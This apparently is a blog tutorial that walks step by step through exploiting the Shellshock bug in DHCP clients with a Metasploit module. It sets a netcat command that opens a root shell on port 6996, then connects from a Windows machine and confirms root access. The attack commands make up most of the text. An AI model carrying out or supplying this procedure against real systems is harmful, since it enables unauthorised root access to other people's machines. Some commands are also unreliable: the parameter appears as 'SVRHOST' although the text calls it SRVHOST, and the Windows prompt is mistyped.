Step 1: Start Metasploit
Let's begin, of course, by firing up Kali Linux and starting Metasploit. You should be greeted by a screen similar to the following one.
Step 2: Update Metasploit
Since this is a new Meatsploit module, it is not in your Metasploit Framework when you downloaded Kali, so we need to update Metasploit. Let's open a terminal and type:
kali > msfupdate
This might take awhile, so be patient.
Step 3: Find the Exploit
Now that we updated our Metasploit and presumably downloaded the new Shellshock modules, let's find this new exploit. In the Metasploit framework, type:
msf > search shellshock
As we can see, Metasploit found the auxiliary module for attacking the DHCP client using the Shellshock vulnerability.
Let's now load that module by typing:
msf > use auxiliary/server/dhclient/dhclient_bash_env
Now, let's type info to get more information on this module.
msf > info
We can see in the screenshot above each of the various options for this module and some basic information about it. The key parameters are CMD, SRVHOST, and NETMASK.
Step 4: Set Up the Module Parameters
Now, let's show options.
msf > show options
First, let's set the DHCP server IP. This is the SRVHOST parameter.
msf > set SVRHOST 192.168.131.254
Next, let's set the code that we want to inject through the BASH shell. Although, this module comes with a netcat command by default, let's change it slightly with a command that I have found gives us better and more reliable results.
msf > set CMD /bin/nc -l -p6996 -e /bin/sh
Lastly, let's set the NETMASK.
msf > set NETMASK 255.255.255.0
Finally, let's simply type "exploit" to run the module.
msf > exploit
When we do so, we simply get the message "Auxiliary module execution completed." In our case here, this simply means that we were able to run our CMD line using the Shellshock vulnerability to set up a netcat listener with root privileges on port 6996 piping out a BASH shell to whoever chooses to connect to it!
Step 5: Connect to the Exploited System
Now that we have injected netcat into the vulnerable system, we should be able to connect to that machine remotely with administrative/root privileges. We would then own that machine!
For demonstration purposes, let's connect to that system with a Windows machine remotely by connecting to the netcat listener. First, open a command prompt on the Windows system and type:
c::\nc 192.168.131.129 6996
When we do so, it will return a blank line. When we type "ifconfig":
ifconfig
It returns the network settings of the exploited Linux system. Now, to confirm our privilege level, let's type "whoami":
whoami
In this screenshot, you can see that we have not only been able to access the system remotely, but we have root privileges. We OWN this system!
No comments:
Post a Comment